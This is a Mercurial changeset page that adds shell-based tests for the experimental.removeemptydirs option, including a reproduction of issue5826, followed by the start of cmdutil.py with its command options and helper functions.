unlinkpath: make empty directory removal optional (issue5901) (issue5826)
Kyle Lippincott
r38512:da2a7d83 (default branch)
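At its core, the change makes Mercurial's unlinkpath helper stop pruning newly
empty parent directories when a caller asks it not to, gated by the new
experimental.removeemptydirs config knob. A minimal sketch of that shape
(assuming the tryunlink/unlink/removedirs helpers from mercurial.util; the
exact signature is an illustration, not a quote of the committed code):

    def unlinkpath(f, ignoremissing=False, rmdir=True):
        """unlink f, and prune its directory if it is then empty"""
        if ignoremissing:
            tryunlink(f)
        else:
            unlink(f)
        if rmdir:
            # try removing directories that might now be empty
            try:
                removedirs(os.path.dirname(f))
            except OSError:
                pass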
@@ -0,0 +1,242 @@
Tests for experimental.removeemptydirs

  $ NO_RM=--config=experimental.removeemptydirs=0
  $ isdir() { if [ -d $1 ]; then echo yes; else echo no; fi }
  $ isfile() { if [ -f $1 ]; then echo yes; else echo no; fi }

`hg rm` of the last file in a directory:
  $ hg init hgrm
  $ cd hgrm
  $ mkdir somedir
  $ echo hi > somedir/foo
  $ hg ci -qAm foo
  $ isdir somedir
  yes
  $ hg rm somedir/foo
  $ isdir somedir
  no
  $ hg revert -qa
  $ isdir somedir
  yes
  $ hg $NO_RM rm somedir/foo
  $ isdir somedir
  yes
  $ ls somedir
  $ cd $TESTTMP
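The $NO_RM runs above work because command implementations consult the config
and thread it through to unlinkpath. A sketch of the caller-side wiring the
tests exercise (assumed shape based on the commit summary; the rmdir parameter
name is illustrative):

    rmdir = repo.ui.configbool('experimental', 'removeemptydirs')
    repo.wvfs.unlinkpath(f, ignoremissing=True, rmdir=rmdir)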
`hg mv` of the last file in a directory:
  $ hg init hgmv
  $ cd hgmv
  $ mkdir somedir
  $ mkdir destdir
  $ echo hi > somedir/foo
  $ hg ci -qAm foo
  $ isdir somedir
  yes
  $ hg mv somedir/foo destdir/foo
  $ isdir somedir
  no
  $ hg revert -qa
(revert doesn't get rid of destdir/foo?)
  $ rm destdir/foo
  $ isdir somedir
  yes
  $ hg $NO_RM mv somedir/foo destdir/foo
  $ isdir somedir
  yes
  $ ls somedir
  $ cd $TESTTMP

Updating to a commit that doesn't have the directory:
  $ hg init hgupdate
  $ cd hgupdate
  $ echo hi > r0
  $ hg ci -qAm r0
  $ mkdir somedir
  $ echo hi > somedir/foo
  $ hg ci -qAm r1
  $ isdir somedir
  yes
  $ hg co -q -r ".^"
  $ isdir somedir
  no
  $ hg co -q tip
  $ isdir somedir
  yes
  $ hg $NO_RM co -q -r ".^"
  $ isdir somedir
  yes
  $ ls somedir
  $ cd $TESTTMP

Rebasing across a commit that doesn't have the directory, from inside the
directory:
  $ hg init hgrebase
  $ cd hgrebase
  $ echo hi > r0
  $ hg ci -qAm r0
  $ mkdir somedir
  $ echo hi > somedir/foo
  $ hg ci -qAm first_rebase_source
  $ hg $NO_RM co -q -r ".^"
  $ echo hi > somedir/bar
  $ hg ci -qAm first_rebase_dest
  $ hg $NO_RM co -q -r ".^"
  $ echo hi > somedir/baz
  $ hg ci -qAm second_rebase_dest
  $ hg co -qr 'desc(first_rebase_source)'
  $ cd $TESTTMP/hgrebase/somedir
  $ hg --config extensions.rebase= rebase -qr . -d 'desc(first_rebase_dest)'
  current directory was removed
  (consider changing to repo root: $TESTTMP/hgrebase)
  $ cd $TESTTMP/hgrebase/somedir
(The current node is the rebased first_rebase_source on top of
first_rebase_dest)
This should not output anything about current directory being removed:
  $ hg $NO_RM --config extensions.rebase= rebase -qr . -d 'desc(second_rebase_dest)'
  $ cd $TESTTMP

Histediting across a commit that doesn't have the directory, from inside the
directory (reordering nodes):
  $ hg init hghistedit
  $ cd hghistedit
  $ echo hi > r0
  $ hg ci -qAm r0
  $ echo hi > r1
  $ hg ci -qAm r1
  $ echo hi > r2
  $ hg ci -qAm r2
  $ mkdir somedir
  $ echo hi > somedir/foo
  $ hg ci -qAm migrating_revision
  $ cat > histedit_commands <<EOF
  > pick 89079fab8aee 0 r0
  > pick e6d271df3142 1 r1
  > pick 89e25aa83f0f 3 migrating_revision
  > pick b550aa12d873 2 r2
  > EOF
  $ cd $TESTTMP/hghistedit/somedir
  $ hg --config extensions.histedit= histedit -q --commands ../histedit_commands

histedit doesn't output anything when the current directory is removed. We rely
on these tests commonly being run on machines where the current directory
disappearing out from underneath us actually has an observable effect, such as
an error or no files listed.
#if linuxormacos
  $ isfile foo
  no
#endif
  $ cd $TESTTMP/hghistedit/somedir
  $ isfile foo
  yes

  $ cd $TESTTMP/hghistedit
  $ cat > histedit_commands <<EOF
  > pick 89079fab8aee 0 r0
  > pick 7c7a22c6009f 3 migrating_revision
  > pick e6d271df3142 1 r1
  > pick 40a53c2d4276 2 r2
  > EOF
  $ cd $TESTTMP/hghistedit/somedir
  $ hg $NO_RM --config extensions.histedit= histedit -q --commands ../histedit_commands
Regardless of system, we should always get a 'yes' here.
  $ isfile foo
  yes
  $ cd $TESTTMP

This is essentially the exact test from issue5826, just cleaned up a little:

  $ hg init issue5826_withrm
  $ cd issue5826_withrm

  $ cat >> $HGRCPATH <<EOF
  > [extensions]
  > histedit =
  > EOF
Commit three revisions that each create a directory:

  $ mkdir foo
  $ touch foo/bar
  $ hg commit -qAm "add foo"

  $ mkdir bar
  $ touch bar/bar
  $ hg commit -qAm "add bar"

  $ mkdir baz
  $ touch baz/bar
  $ hg commit -qAm "add baz"

Enter the first directory:

  $ cd foo

Histedit doing 'pick, pick, fold':

  $ hg histedit --commands /dev/stdin <<EOF
  > pick 6274c77c93c3 1 add bar
  > pick ff70a87b588f 0 add foo
  > fold 9992bb0ac0db 2 add baz
  > EOF
  abort: $ENOENT$
  [255]

Go back to the repo root after losing it as part of that operation:
  $ cd $TESTTMP/issue5826_withrm

Note the lack of a non-zero exit code from this command - it exits
successfully, but doesn't really do anything.
  $ hg histedit --continue
  9992bb0ac0db: cannot fold - working copy is not a descendant of previous commit 5c806432464a
  saved backup bundle to $TESTTMP/issue5826_withrm/.hg/strip-backup/ff70a87b588f-e94f9789-histedit.hg

  $ hg log -T '{rev}:{node|short} {desc}\n'
  2:94e3f9fae1d6 fold-temp-revision 9992bb0ac0db
  1:5c806432464a add foo
  0:d17db4b0303a add bar

Now test that again with experimental.removeemptydirs=false:
  $ hg init issue5826_norm
  $ cd issue5826_norm

  $ cat >> $HGRCPATH <<EOF
  > [extensions]
  > histedit =
  > [experimental]
  > removeemptydirs = false
  > EOF
Commit three revisions that each create a directory:

  $ mkdir foo
  $ touch foo/bar
  $ hg commit -qAm "add foo"

  $ mkdir bar
  $ touch bar/bar
  $ hg commit -qAm "add bar"

  $ mkdir baz
  $ touch baz/bar
  $ hg commit -qAm "add baz"

Enter the first directory:

  $ cd foo

Histedit doing 'pick, pick, fold':

  $ hg histedit --commands /dev/stdin <<EOF
  > pick 6274c77c93c3 1 add bar
  > pick ff70a87b588f 0 add foo
  > fold 9992bb0ac0db 2 add baz
  > EOF
  saved backup bundle to $TESTTMP/issue5826_withrm/issue5826_norm/.hg/strip-backup/5c806432464a-cd4c8d86-histedit.hg

Note that no 'cd' back to the repo root is necessary here, and we don't need
'histedit --continue'.

  $ hg log -T '{rev}:{node|short} {desc}\n'
  1:b9eddaa97cbc add foo
  ***
  add baz
  0:d17db4b0303a add bar
@@ -1,3259 +1,3263 @@
# cmdutil.py - help for command processing in mercurial
#
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import absolute_import

import errno
import os
import re

from .i18n import _
from .node import (
    hex,
    nullid,
    nullrev,
    short,
)

from . import (
    bookmarks,
    changelog,
    copies,
    crecord as crecordmod,
    dirstateguard,
    encoding,
    error,
    formatter,
    logcmdutil,
    match as matchmod,
    merge as mergemod,
    mergeutil,
    obsolete,
    patch,
    pathutil,
    phases,
    pycompat,
    revlog,
    rewriteutil,
    scmutil,
    smartset,
    subrepoutil,
    templatekw,
    templater,
    util,
    vfs as vfsmod,
)

from .utils import (
    dateutil,
    stringutil,
)

stringio = util.stringio

# templates of common command options

dryrunopts = [
    ('n', 'dry-run', None,
     _('do not perform actions, just print output')),
]

remoteopts = [
    ('e', 'ssh', '',
     _('specify ssh command to use'), _('CMD')),
    ('', 'remotecmd', '',
     _('specify hg command to run on the remote side'), _('CMD')),
    ('', 'insecure', None,
     _('do not verify server certificate (ignoring web.cacerts config)')),
]

walkopts = [
    ('I', 'include', [],
     _('include names matching the given patterns'), _('PATTERN')),
    ('X', 'exclude', [],
     _('exclude names matching the given patterns'), _('PATTERN')),
]

commitopts = [
    ('m', 'message', '',
     _('use text as commit message'), _('TEXT')),
    ('l', 'logfile', '',
     _('read commit message from file'), _('FILE')),
]

commitopts2 = [
    ('d', 'date', '',
     _('record the specified date as commit date'), _('DATE')),
    ('u', 'user', '',
     _('record the specified user as committer'), _('USER')),
]

# hidden for now
formatteropts = [
    ('T', 'template', '',
     _('display with template (EXPERIMENTAL)'), _('TEMPLATE')),
]

templateopts = [
    ('', 'style', '',
     _('display using template map file (DEPRECATED)'), _('STYLE')),
    ('T', 'template', '',
     _('display with template'), _('TEMPLATE')),
]

logopts = [
    ('p', 'patch', None, _('show patch')),
    ('g', 'git', None, _('use git extended diff format')),
    ('l', 'limit', '',
     _('limit number of changes displayed'), _('NUM')),
    ('M', 'no-merges', None, _('do not show merges')),
    ('', 'stat', None, _('output diffstat-style summary of changes')),
    ('G', 'graph', None, _("show the revision DAG")),
] + templateopts

diffopts = [
    ('a', 'text', None, _('treat all files as text')),
    ('g', 'git', None, _('use git extended diff format')),
    ('', 'binary', None, _('generate binary diffs in git mode (default)')),
    ('', 'nodates', None, _('omit dates from diff headers'))
]

diffwsopts = [
    ('w', 'ignore-all-space', None,
     _('ignore white space when comparing lines')),
    ('b', 'ignore-space-change', None,
     _('ignore changes in the amount of white space')),
    ('B', 'ignore-blank-lines', None,
     _('ignore changes whose lines are all blank')),
    ('Z', 'ignore-space-at-eol', None,
     _('ignore changes in whitespace at EOL')),
]

diffopts2 = [
    ('', 'noprefix', None, _('omit a/ and b/ prefixes from filenames')),
    ('p', 'show-function', None, _('show which function each change is in')),
    ('', 'reverse', None, _('produce a diff that undoes the changes')),
] + diffwsopts + [
    ('U', 'unified', '',
     _('number of lines of context to show'), _('NUM')),
    ('', 'stat', None, _('output diffstat-style summary of changes')),
    ('', 'root', '', _('produce diffs relative to subdirectory'), _('DIR')),
]

mergetoolopts = [
    ('t', 'tool', '', _('specify merge tool')),
]

similarityopts = [
    ('s', 'similarity', '',
     _('guess renamed files by similarity (0<=s<=100)'), _('SIMILARITY'))
]

subrepoopts = [
    ('S', 'subrepos', None,
     _('recurse into subrepositories'))
]

debugrevlogopts = [
    ('c', 'changelog', False, _('open changelog')),
    ('m', 'manifest', False, _('open manifest')),
    ('', 'dir', '', _('open directory manifest')),
]

# special string such that everything below this line will be ignored in the
# editor text
_linebelow = "^HG: ------------------------ >8 ------------------------$"
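# Illustrative note (not part of the original file): given an editor buffer
#
#   fix frobnicator overflow
#   HG: ------------------------ >8 ------------------------
#   diff --git a/foo b/foo
#   ...
#
# the scissors line and everything below it are dropped from the final
# commit message.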

def ishunk(x):
    hunkclasses = (crecordmod.uihunk, patch.recordhunk)
    return isinstance(x, hunkclasses)

def newandmodified(chunks, originalchunks):
    newlyaddedandmodifiedfiles = set()
    for chunk in chunks:
        if ishunk(chunk) and chunk.header.isnewfile() and chunk not in \
            originalchunks:
            newlyaddedandmodifiedfiles.add(chunk.header.filename())
    return newlyaddedandmodifiedfiles

def parsealiases(cmd):
    return cmd.lstrip("^").split("|")
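# Illustrative example (not part of the original file): a command table key
# like "^log|history" parses to the alias list ['log', 'history']; the '^'
# prefix only marks the command for inclusion in short help.
#   parsealiases("^log|history")  ->  ['log', 'history']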

def setupwrapcolorwrite(ui):
    # wrap ui.write so diff output can be labeled/colorized
    def wrapwrite(orig, *args, **kw):
        label = kw.pop(r'label', '')
        for chunk, l in patch.difflabel(lambda: args):
            orig(chunk, label=label + l)

    oldwrite = ui.write
    def wrap(*args, **kwargs):
        return wrapwrite(oldwrite, *args, **kwargs)
    setattr(ui, 'write', wrap)
    return oldwrite

def filterchunks(ui, originalhunks, usecurses, testfile, operation=None):
    try:
        if usecurses:
            if testfile:
                recordfn = crecordmod.testdecorator(
                    testfile, crecordmod.testchunkselector)
            else:
                recordfn = crecordmod.chunkselector

            return crecordmod.filterpatch(ui, originalhunks, recordfn,
                                          operation)
    except crecordmod.fallbackerror as e:
        ui.warn('%s\n' % e.message)
        ui.warn(_('falling back to text mode\n'))

    return patch.filterpatch(ui, originalhunks, operation)

def recordfilter(ui, originalhunks, operation=None):
    """ Prompts the user to filter the originalhunks and return a list of
    selected hunks.
    *operation* is used to build ui messages indicating to the user what
    kind of filtering they are doing: reverting, committing, shelving, etc.
    (see patch.filterpatch).
    """
    usecurses = crecordmod.checkcurses(ui)
    testfile = ui.config('experimental', 'crecordtest')
    oldwrite = setupwrapcolorwrite(ui)
    try:
        newchunks, newopts = filterchunks(ui, originalhunks, usecurses,
                                          testfile, operation)
    finally:
        ui.write = oldwrite
    return newchunks, newopts

def dorecord(ui, repo, commitfunc, cmdsuggest, backupall,
             filterfn, *pats, **opts):
    opts = pycompat.byteskwargs(opts)
    if not ui.interactive():
        if cmdsuggest:
            msg = _('running non-interactively, use %s instead') % cmdsuggest
        else:
            msg = _('running non-interactively')
        raise error.Abort(msg)

    # make sure username is set before going interactive
    if not opts.get('user'):
        ui.username() # raise exception, username not provided

    def recordfunc(ui, repo, message, match, opts):
        """This is the generic record driver.

        Its job is to interactively filter local changes, and
        accordingly prepare the working directory into a state in which the
        job can be delegated to a non-interactive commit command such as
        'commit' or 'qrefresh'.

        After the actual job is done by the non-interactive command, the
        working directory is restored to its original state.

        In the end we'll record interesting changes, and everything else
        will be left in place, so the user can continue working.
        """

        checkunfinished(repo, commit=True)
        wctx = repo[None]
        merge = len(wctx.parents()) > 1
        if merge:
            raise error.Abort(_('cannot partially commit a merge '
                                '(use "hg commit" instead)'))

        def fail(f, msg):
            raise error.Abort('%s: %s' % (f, msg))

        force = opts.get('force')
        if not force:
            vdirs = []
            match.explicitdir = vdirs.append
            match.bad = fail

        status = repo.status(match=match)
        if not force:
            repo.checkcommitpatterns(wctx, vdirs, match, status, fail)
        diffopts = patch.difffeatureopts(ui, opts=opts, whitespace=True)
        diffopts.nodates = True
        diffopts.git = True
        diffopts.showfunc = True
        originaldiff = patch.diff(repo, changes=status, opts=diffopts)
        originalchunks = patch.parsepatch(originaldiff)

        # 1. filter patch, since we are intending to apply subset of it
        try:
            chunks, newopts = filterfn(ui, originalchunks)
        except error.PatchError as err:
            raise error.Abort(_('error parsing patch: %s') % err)
        opts.update(newopts)

        # We need to keep a backup of files that have been newly added and
        # modified during the recording process because there is a previous
        # version without the edit in the workdir
        newlyaddedandmodifiedfiles = newandmodified(chunks, originalchunks)
        contenders = set()
        for h in chunks:
            try:
                contenders.update(set(h.files()))
            except AttributeError:
                pass

        changed = status.modified + status.added + status.removed
        newfiles = [f for f in changed if f in contenders]
        if not newfiles:
            ui.status(_('no changes to record\n'))
            return 0

        modified = set(status.modified)

        # 2. backup changed files, so we can restore them in the end

        if backupall:
            tobackup = changed
        else:
            tobackup = [f for f in newfiles if f in modified or f in \
                    newlyaddedandmodifiedfiles]
        backups = {}
        if tobackup:
            backupdir = repo.vfs.join('record-backups')
            try:
                os.mkdir(backupdir)
            except OSError as err:
                if err.errno != errno.EEXIST:
                    raise
        try:
            # backup continues
            for f in tobackup:
                fd, tmpname = pycompat.mkstemp(prefix=f.replace('/', '_') + '.',
                                               dir=backupdir)
                os.close(fd)
                ui.debug('backup %r as %r\n' % (f, tmpname))
                util.copyfile(repo.wjoin(f), tmpname, copystat=True)
                backups[f] = tmpname

            fp = stringio()
            for c in chunks:
                fname = c.filename()
                if fname in backups:
                    c.write(fp)
            dopatch = fp.tell()
            fp.seek(0)

            # 2.5 optionally review / modify patch in text editor
            if opts.get('review', False):
                patchtext = (crecordmod.diffhelptext
                             + crecordmod.patchhelptext
                             + fp.read())
                reviewedpatch = ui.edit(patchtext, "",
                                        action="diff",
                                        repopath=repo.path)
                fp.truncate(0)
                fp.write(reviewedpatch)
                fp.seek(0)

            [os.unlink(repo.wjoin(c)) for c in newlyaddedandmodifiedfiles]
            # 3a. apply filtered patch to clean repo (clean)
            if backups:
                # Equivalent to hg.revert
                m = scmutil.matchfiles(repo, backups.keys())
                mergemod.update(repo, repo.dirstate.p1(),
                                False, True, matcher=m)

            # 3b. (apply)
            if dopatch:
                try:
                    ui.debug('applying patch\n')
                    ui.debug(fp.getvalue())
                    patch.internalpatch(ui, repo, fp, 1, eolmode=None)
                except error.PatchError as err:
                    raise error.Abort(pycompat.bytestr(err))
            del fp

            # 4. We prepared working directory according to filtered
            #    patch. Now is the time to delegate the job to
            #    commit/qrefresh or the like!

            # Make all of the pathnames absolute.
            newfiles = [repo.wjoin(nf) for nf in newfiles]
            return commitfunc(ui, repo, *newfiles, **pycompat.strkwargs(opts))
        finally:
            # 5. finally restore backed-up files
            try:
                dirstate = repo.dirstate
                for realname, tmpname in backups.iteritems():
                    ui.debug('restoring %r to %r\n' % (tmpname, realname))

                    if dirstate[realname] == 'n':
                        # without normallookup, restoring timestamp
                        # may cause partially committed files
                        # to be treated as unmodified
                        dirstate.normallookup(realname)

                    # copystat=True here and above are a hack to trick any
                    # editors that have f open into thinking that we haven't
                    # modified it.
                    #
                    # Also note that this is racy as an editor could notice
                    # the file's mtime before we've finished writing it.
                    util.copyfile(tmpname, repo.wjoin(realname), copystat=True)
                    os.unlink(tmpname)
                if tobackup:
                    os.rmdir(backupdir)
            except OSError:
                pass

    def recordinwlock(ui, repo, message, match, opts):
        with repo.wlock():
            return recordfunc(ui, repo, message, match, opts)

    return commit(ui, repo, recordinwlock, pats, opts)

class dirnode(object):
    """
    Represent a directory in user working copy with information required for
    the purpose of tersing its status.

    path is the path to the directory, without a trailing '/'

    statuses is a set of statuses of all files in this directory (this includes
    all the files in all the subdirectories too)

    files is a list of files which are direct children of this directory

    subdirs is a dictionary of sub-directory name as the key and its own
    dirnode object as the value
    """

    def __init__(self, dirpath):
        self.path = dirpath
        self.statuses = set([])
        self.files = []
        self.subdirs = {}

    def _addfileindir(self, filename, status):
        """Add a file in this directory as a direct child."""
        self.files.append((filename, status))

    def addfile(self, filename, status):
        """
        Add a file to this directory or to its direct parent directory.

        If the file is not a direct child of this directory, we traverse to
        the directory it is a direct child of and add the file there.
        """

        # if the filename contains a path separator, it is not a direct
        # child of this directory
        if '/' in filename:
            subdir, filep = filename.split('/', 1)

            # does the dirnode object for subdir exist
            if subdir not in self.subdirs:
                subdirpath = pathutil.join(self.path, subdir)
                self.subdirs[subdir] = dirnode(subdirpath)

            # try adding the file in subdir
            self.subdirs[subdir].addfile(filep, status)

        else:
            self._addfileindir(filename, status)

        if status not in self.statuses:
            self.statuses.add(status)

    def iterfilepaths(self):
        """Yield (status, path) for files directly under this directory."""
        for f, st in self.files:
            yield st, pathutil.join(self.path, f)

    def tersewalk(self, terseargs):
        """
        Yield (status, path) obtained by processing the status of this
        dirnode.

        terseargs is the string of arguments passed by the user with `--terse`
        flag.

        Following are the cases which can happen:

        1) All the files in the directory (including all the files in its
        subdirectories) share the same status and the user has asked us to
        terse that status. -> yield (status, dirpath). dirpath will end in '/'.

        2) Otherwise, we do the following:

           a) Yield (status, filepath) for all the files which are in this
              directory (only the ones in this directory, not the subdirs)

           b) Recurse the function on all the subdirectories of this
              directory
        """

        if len(self.statuses) == 1:
            onlyst = self.statuses.pop()

            # Making sure we terse only when the status abbreviation is
            # passed as terse argument
            if onlyst in terseargs:
                yield onlyst, self.path + '/'
                return

        # add the files to status list
        for st, fpath in self.iterfilepaths():
            yield st, fpath

        # recurse on the subdirs
        for dirobj in self.subdirs.values():
            for st, fpath in dirobj.tersewalk(terseargs):
                yield st, fpath

def tersedir(statuslist, terseargs):
    """
    Terse the status if all the files in a directory share the same status.

    statuslist is a scmutil.status() object which contains a list of files for
    each status.
    terseargs is the string which is passed by the user as the argument to
    `--terse` flag.

    The function makes a tree of objects of dirnode class, and at each node it
    stores the information required to know whether we can terse a certain
    directory or not.
    """
    # the order matters here as that is used to produce final list
    allst = ('m', 'a', 'r', 'd', 'u', 'i', 'c')

    # checking the argument validity
    for s in pycompat.bytestr(terseargs):
        if s not in allst:
            raise error.Abort(_("'%s' not recognized") % s)

    # creating a dirnode object for the root of the repo
    rootobj = dirnode('')
    pstatus = ('modified', 'added', 'deleted', 'clean', 'unknown',
               'ignored', 'removed')

    tersedict = {}
    for attrname in pstatus:
        statuschar = attrname[0:1]
        for f in getattr(statuslist, attrname):
            rootobj.addfile(f, statuschar)
        tersedict[statuschar] = []

    # we won't be tersing the root dir, so add files in it
    for st, fpath in rootobj.iterfilepaths():
        tersedict[st].append(fpath)

    # process each sub-directory and build tersedict
    for subdir in rootobj.subdirs.values():
        for st, f in subdir.tersewalk(terseargs):
            tersedict[st].append(f)

    tersedlist = []
    for st in allst:
        tersedict[st].sort()
        tersedlist.append(tersedict[st])

    return tersedlist
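# Illustrative example (not part of the original file): if terseargs contains
# 'm' and every file under docs/ (including subdirectories) is modified,
# tersewalk collapses them into the single entry ('m', 'docs/'), so tersedir
# returns 'docs/' in the 'm' slot of the result instead of each file path.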

def _commentlines(raw):
    '''Surround lines with a comment char and a new line'''
    lines = raw.splitlines()
    commentedlines = ['# %s' % line for line in lines]
    return '\n'.join(commentedlines) + '\n'

def _conflictsmsg(repo):
    mergestate = mergemod.mergestate.read(repo)
    if not mergestate.active():
        return

    m = scmutil.match(repo[None])
    unresolvedlist = [f for f in mergestate.unresolved() if m(f)]
    if unresolvedlist:
        mergeliststr = '\n'.join(
            [' %s' % util.pathto(repo.root, pycompat.getcwd(), path)
             for path in unresolvedlist])
        msg = _('''Unresolved merge conflicts:

%s

To mark files as resolved: hg resolve --mark FILE''') % mergeliststr
    else:
        msg = _('No unresolved merge conflicts.')

    return _commentlines(msg)

def _helpmessage(continuecmd, abortcmd):
    msg = _('To continue: %s\n'
            'To abort: %s') % (continuecmd, abortcmd)
    return _commentlines(msg)

def _rebasemsg():
    return _helpmessage('hg rebase --continue', 'hg rebase --abort')

def _histeditmsg():
    return _helpmessage('hg histedit --continue', 'hg histedit --abort')

def _unshelvemsg():
    return _helpmessage('hg unshelve --continue', 'hg unshelve --abort')

def _updatecleanmsg(dest=None):
    warning = _('warning: this will discard uncommitted changes')
    return 'hg update --clean %s (%s)' % (dest or '.', warning)

def _graftmsg():
    # tweakdefaults requires `update` to have a rev hence the `.`
    return _helpmessage('hg graft --continue', _updatecleanmsg())

def _mergemsg():
    # tweakdefaults requires `update` to have a rev hence the `.`
    return _helpmessage('hg commit', _updatecleanmsg())

def _bisectmsg():
    msg = _('To mark the changeset good: hg bisect --good\n'
            'To mark the changeset bad: hg bisect --bad\n'
            'To abort: hg bisect --reset\n')
    return _commentlines(msg)

def fileexistspredicate(filename):
    return lambda repo: repo.vfs.exists(filename)

def _mergepredicate(repo):
    return len(repo[None].parents()) > 1

STATES = (
    # (state, predicate to detect states, helpful message function)
    ('histedit', fileexistspredicate('histedit-state'), _histeditmsg),
    ('bisect', fileexistspredicate('bisect.state'), _bisectmsg),
    ('graft', fileexistspredicate('graftstate'), _graftmsg),
    ('unshelve', fileexistspredicate('shelvedstate'), _unshelvemsg),
    ('rebase', fileexistspredicate('rebasestate'), _rebasemsg),
    # The merge state is part of a list that will be iterated over.
    # They need to be last because some of the other unfinished states may also
    # be in a merge or update state (eg. rebase, histedit, graft, etc).
    # We want those to have priority.
    ('merge', _mergepredicate, _mergemsg),
)

def _getrepostate(repo):
    # experimental config: commands.status.skipstates
    skip = set(repo.ui.configlist('commands', 'status.skipstates'))
    for state, statedetectionpredicate, msgfn in STATES:
        if state in skip:
            continue
        if statedetectionpredicate(repo):
            return (state, statedetectionpredicate, msgfn)

def morestatus(repo, fm):
    statetuple = _getrepostate(repo)
    label = 'status.morestatus'
    if statetuple:
        fm.startitem()
        state, statedetectionpredicate, helpfulmsg = statetuple
        statemsg = _('The repository is in an unfinished *%s* state.') % state
        fm.write('statemsg', '%s\n', _commentlines(statemsg), label=label)
        conmsg = _conflictsmsg(repo)
        if conmsg:
            fm.write('conflictsmsg', '%s\n', conmsg, label=label)
        if helpfulmsg:
            helpmsg = helpfulmsg()
            fm.write('helpmsg', '%s\n', helpmsg, label=label)

def findpossible(cmd, table, strict=False):
    """
    Return cmd -> (aliases, command table entry)
    for each matching command.
    Return debug commands (or their aliases) only if no normal command matches.
    """
    choice = {}
    debugchoice = {}

    if cmd in table:
        # short-circuit exact matches, "log" alias beats "^log|history"
        keys = [cmd]
    else:
        keys = table.keys()

    allcmds = []
    for e in keys:
        aliases = parsealiases(e)
        allcmds.extend(aliases)
        found = None
        if cmd in aliases:
            found = cmd
        elif not strict:
            for a in aliases:
                if a.startswith(cmd):
                    found = a
                    break
        if found is not None:
            if aliases[0].startswith("debug") or found.startswith("debug"):
                debugchoice[found] = (aliases, table[e])
            else:
                choice[found] = (aliases, table[e])

    if not choice and debugchoice:
        choice = debugchoice

    return choice, allcmds

def findcmd(cmd, table, strict=True):
    """Return (aliases, command table entry) for command string."""
    choice, allcmds = findpossible(cmd, table, strict)

    if cmd in choice:
        return choice[cmd]

    if len(choice) > 1:
        clist = sorted(choice)
        raise error.AmbiguousCommand(cmd, clist)

    if choice:
        return list(choice.values())[0]

    raise error.UnknownCommand(cmd, allcmds)
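# Illustrative behavior (not part of the original file): with strict=False a
# unique prefix resolves to its full command, while an ambiguous prefix
# raises AmbiguousCommand:
#   findcmd('stat', table, strict=False)  ->  entry for 'status'
#   findcmd('re', table, strict=False)    ->  error.AmbiguousCommand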
720
720
721 def changebranch(ui, repo, revs, label):
721 def changebranch(ui, repo, revs, label):
722 """ Change the branch name of given revs to label """
722 """ Change the branch name of given revs to label """
723
723
724 with repo.wlock(), repo.lock(), repo.transaction('branches'):
724 with repo.wlock(), repo.lock(), repo.transaction('branches'):
725 # abort in case of uncommitted merge or dirty wdir
725 # abort in case of uncommitted merge or dirty wdir
726 bailifchanged(repo)
726 bailifchanged(repo)
727 revs = scmutil.revrange(repo, revs)
727 revs = scmutil.revrange(repo, revs)
728 if not revs:
728 if not revs:
729 raise error.Abort("empty revision set")
729 raise error.Abort("empty revision set")
730 roots = repo.revs('roots(%ld)', revs)
730 roots = repo.revs('roots(%ld)', revs)
731 if len(roots) > 1:
731 if len(roots) > 1:
732 raise error.Abort(_("cannot change branch of non-linear revisions"))
732 raise error.Abort(_("cannot change branch of non-linear revisions"))
733 rewriteutil.precheck(repo, revs, 'change branch of')
733 rewriteutil.precheck(repo, revs, 'change branch of')
734
734
735 root = repo[roots.first()]
735 root = repo[roots.first()]
736 if not root.p1().branch() == label and label in repo.branchmap():
736 if not root.p1().branch() == label and label in repo.branchmap():
737 raise error.Abort(_("a branch of the same name already exists"))
737 raise error.Abort(_("a branch of the same name already exists"))
738
738
739 if repo.revs('merge() and %ld', revs):
739 if repo.revs('merge() and %ld', revs):
740 raise error.Abort(_("cannot change branch of a merge commit"))
740 raise error.Abort(_("cannot change branch of a merge commit"))
741 if repo.revs('obsolete() and %ld', revs):
741 if repo.revs('obsolete() and %ld', revs):
742 raise error.Abort(_("cannot change branch of a obsolete changeset"))
742 raise error.Abort(_("cannot change branch of a obsolete changeset"))
743
743
744 # make sure only topological heads
744 # make sure only topological heads
745 if repo.revs('heads(%ld) - head()', revs):
745 if repo.revs('heads(%ld) - head()', revs):
746 raise error.Abort(_("cannot change branch in middle of a stack"))
746 raise error.Abort(_("cannot change branch in middle of a stack"))
747
747
748 replacements = {}
748 replacements = {}
749 # avoid import cycle mercurial.cmdutil -> mercurial.context ->
    # avoid import cycle mercurial.cmdutil -> mercurial.context ->
    # mercurial.subrepo -> mercurial.cmdutil
    from . import context
    for rev in revs:
        ctx = repo[rev]
        oldbranch = ctx.branch()
        # check if ctx has same branch
        if oldbranch == label:
            continue

        def filectxfn(repo, newctx, path):
            try:
                return ctx[path]
            except error.ManifestLookupError:
                return None

        ui.debug("changing branch of '%s' from '%s' to '%s'\n"
                 % (hex(ctx.node()), oldbranch, label))
        extra = ctx.extra()
        extra['branch_change'] = hex(ctx.node())
        # While changing the branch of a set of linear commits, make sure
        # that we base our commits on the new parent rather than the old
        # parent, which was obsoleted while changing the branch
        p1 = ctx.p1().node()
        p2 = ctx.p2().node()
        if p1 in replacements:
            p1 = replacements[p1][0]
        if p2 in replacements:
            p2 = replacements[p2][0]

        mc = context.memctx(repo, (p1, p2),
                            ctx.description(),
                            ctx.files(),
                            filectxfn,
                            user=ctx.user(),
                            date=ctx.date(),
                            extra=extra,
                            branch=label)

        newnode = repo.commitctx(mc)
        replacements[ctx.node()] = (newnode,)
        ui.debug('new node id is %s\n' % hex(newnode))

    # create obsmarkers and move bookmarks
    scmutil.cleanupnodes(repo, replacements, 'branch-change', fixphase=True)

    # move the working copy too
    wctx = repo[None]
    # in-progress merge is a bit too complex for now.
    if len(wctx.parents()) == 1:
        newid = replacements.get(wctx.p1().node())
        if newid is not None:
            # avoid import cycle mercurial.cmdutil -> mercurial.hg ->
            # mercurial.cmdutil
            from . import hg
            hg.update(repo, newid[0], quietempty=True)

    ui.status(_("changed branch on %d changesets\n") % len(replacements))

def findrepo(p):
    while not os.path.isdir(os.path.join(p, ".hg")):
        oldp, p = p, os.path.dirname(p)
        if p == oldp:
            return None

    return p
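
# For illustration: with a repository at /home/alice/proj (hypothetical
# layout, so /home/alice/proj/.hg exists), findrepo('/home/alice/proj/src')
# walks upward and returns '/home/alice/proj'; from a path with no enclosing
# repository the walk reaches the filesystem root and returns None.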

